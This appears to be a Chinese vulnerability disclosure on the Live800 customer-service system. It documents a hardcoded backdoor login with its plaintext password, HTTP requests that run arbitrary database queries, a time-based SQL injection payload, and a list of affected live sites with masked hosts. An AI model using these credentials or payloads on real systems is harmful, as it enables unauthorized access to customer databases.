Live800在线客服系统默认密码导致的SQL查询/SQL注射漏洞

### 简要描述： Live800在线客服系统默认密码导致的SQL查询/SQL注射漏洞 ### 详细说明： 在console/console.jsp文件中硬编码了验证权限的账户密码，通过登录console能够创建公司、修改客服密码，执行select查询以及SQL注射等高风险漏洞： ``` if (request.getParameter("iamkevin") == null) { if (session.getAttribute("login") == null) { //response.sendRedirect("../noContent.jsp"); //return; } } else { if (!"c36a65c325f7a663fa32cb7bb3d07986".equals(WestPayMd5 .getMD5Encode(request.getParameter("iamkevin")))) { //response.sendRedirect("../noContent.jsp"); //return; } } String companyId = request.getParameter("companyId"); if (companyId == null) { companyId = (String) session.getAttribute("configCompanyId"); if (companyId == null) { companyId = ""; } } companyId = URLUtil.escapeHtml(companyId); //password=QQ密码+身份证后4位 if (session.getId().equals(request.getParameter("login"))) { if (true||"9d5e3ecdeb4cdb7acfd63075ae046672".equals(WestPayMd5 .getMD5Encode(request.getParameter("userName"))) && "5c7c90afbf1c7395501c64e6e8daac42" .equals(WestPayMd5.getMD5Encode(request .getParameter("password"))) && !StringUtils.isNullOrLengthZero(companyId)) { session.setAttribute("login", "true"); session.setAttribute("kevinpassword", WestPayMd5 .getMD5Encode(request.getParameter("password"))); session.setAttribute("configCompanyId", companyId); response.sendRedirect("main.jsp"); } } ``` 一共从request中获取5个参数iamkevin、companyId、login、userName、password。 其中iamkevin不等于null，companyId为任意值，login为当前setcookie中的sessionid，username为kevin，password为wuTAO198403242337。 以华为为例（**.**.**.**）进行测试，首先访问： ``` http://**.**.**.**/live800/console/console.jsp ``` 在返回中获得JSESSIONID： [<img src="https://images.seebug.org/upload/201602/20000137222348b64e094fa8478698459cee817e.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/20000137222348b64e094fa8478698459cee817e.png) 这里是15B8A8CBD0D5D037CBAF752BD6361D3C 然后构造登录包： ``` POST /live800/console/console.jsp?login=15B8A8CBD0D5D037CBAF752BD6361D3C HTTP/1.1 Host: **.**.**.** Cookie: JSESSIONID=15B8A8CBD0D5D037CBAF752BD6361D3C Content-Type: application/x-www-form-urlencoded Connection: keep-alive Content-Length: 75 iamkevin=wuxiaohong&companyId=123&userName=kevin&password=wuTAO198403242337 ``` 登录成功后302到main.jsp： [<img src="https://images.seebug.org/upload/201602/200002570e9134795af14f6e1d1515c86db618d6.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/200002570e9134795af14f6e1d1515c86db618d6.png) [<img src="https://images.seebug.org/upload/201602/20000356718d68cf7777dd64791cfae854607aa7.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/20000356718d68cf7777dd64791cfae854607aa7.png) 首先查看配置信息： ``` GET /live800/console/showConfig.jsp HTTP/1.1 Host: **.**.**.** Cookie: JSESSIONID=15B8A8CBD0D5D037CBAF752BD6361D3C Connection: keep-alive ``` [<img src="https://images.seebug.org/upload/201602/2000071059d2705ae86a97469b9035be4457b1a0.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/2000071059d2705ae86a97469b9035be4457b1a0.png) 得到jndi： ``` jdbc/live800_im_crm jdbc/live800_im_analyse jdbc/live800_im_ip jdbc/live800_im ``` 然后在dbcheck.jsp中使用jndi执行select的查询语句： ``` POST /live800/console/dbCheck.jsp HTTP/1.1 Host: **.**.**.** Cookie: JSESSIONID=15B8A8CBD0D5D037CBAF752BD6361D3C Content-Type: application/x-www-form-urlencoded Content-Length: 111 userName=kevin&userPassword=wuTAO198403242337&isQuery=1&dbType=self&jndi=jdbc/live800_im_crm&t=select version() ``` [<img src="https://images.seebug.org/upload/201602/20001141d18675ebf293f08289cac9084103ab68.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/20001141d18675ebf293f08289cac9084103ab68.png) [<img src="https://images.seebug.org/upload/201602/2000122425b979d664dcb9438f4b029fb72b9df6.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/2000122425b979d664dcb9438f4b029fb72b9df6.png) [<img src="https://images.seebug.org/upload/201602/20001548f424ea2ec7974f5fcb0492cfc5afb0c2.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/20001548f424ea2ec7974f5fcb0492cfc5afb0c2.png) 如果这里使用jndi没办法查询的话还有一处SQL注射在console/expireTimeAction.jsp中： ``` String companyId = (String) session.getAttribute("configCompanyId"); if (StringUtils.isNullOrLengthZero(companyId)) { response.sendRedirect("../noContent.jsp"); return; } String expireTime = request.getParameter("expireTime");//延期时间 if (StringUtils.isNullOrLengthZero(expireTime)) { response.sendRedirect("expireTime.jsp?e=" + URLUtil.enCode("请输入延期时间！")); return; } String accountId = request.getParameter("accountId");//延期时间 if (StringUtils.isNullOrLengthZero(expireTime)) { response.sendRedirect("expireTime.jsp?e=" + URLUtil.enCode("发生异常，没有帐号ID！")); return; } try{ Integer.parseInt(accountId); }catch(Exception e){ response.sendRedirect("expireTime.jsp?e=" + URLUtil.enCode("发生异常，没有帐号ID！")); return; } //update operator_account set expire_time = '2013-07-31 00:00:00'; //; String accountSql="update operator_account set expire_time = '"+expireTime+" 00:00:00' where company_id="+companyId+" and account_id="+accountId; if(DBCommuter.update(accountSql)){ String companySql ="update company set account_type=3 where company_id="+companyId; if(DBCommuter.update(companySql)){ response.sendRedirect("expireTime.jsp?e=" + URLUtil.enCode("操作成功!")); }else{ response.sendRedirect("expireTime.jsp?e=" + URLUtil.enCode("操作失败!")); } ``` 直接从request中获取到expireTime的值进入SQL查询中，导致SQL注射发生： ``` GET /live800/console/expireTimeAction.jsp?expireTime=123'and%20sleep(8)%23&accountId=12345678& HTTP/1.1 Host: **.**.**.** Cookie: JSESSIONID=15B8A8CBD0D5D037CBAF752BD6361D3C;;companyId=123 Content-Type: application/x-www-form-urlencoded Content-Length: 108 ``` 在登录后通过SQL通用能够查询出数据库内容，前文http://**.**.**.**/bugs/wooyun-2015-0147511写过这里就不再赘述了。 列几个受影响的站： ``` http://**.**.**.**/live800/console/console.jsp http://**.**.**.**/live800/console/console.jsp http://**.**.**.**/live800/console/console.jsp http://**.**.**.**/console/console.jsp http://**.**.**.**/live800/console/console.jsp http://**.**.**.**/live800/console/console.jsp http://**.**.**.**/live800/console/console.jsp ``` ### 漏洞证明： 同上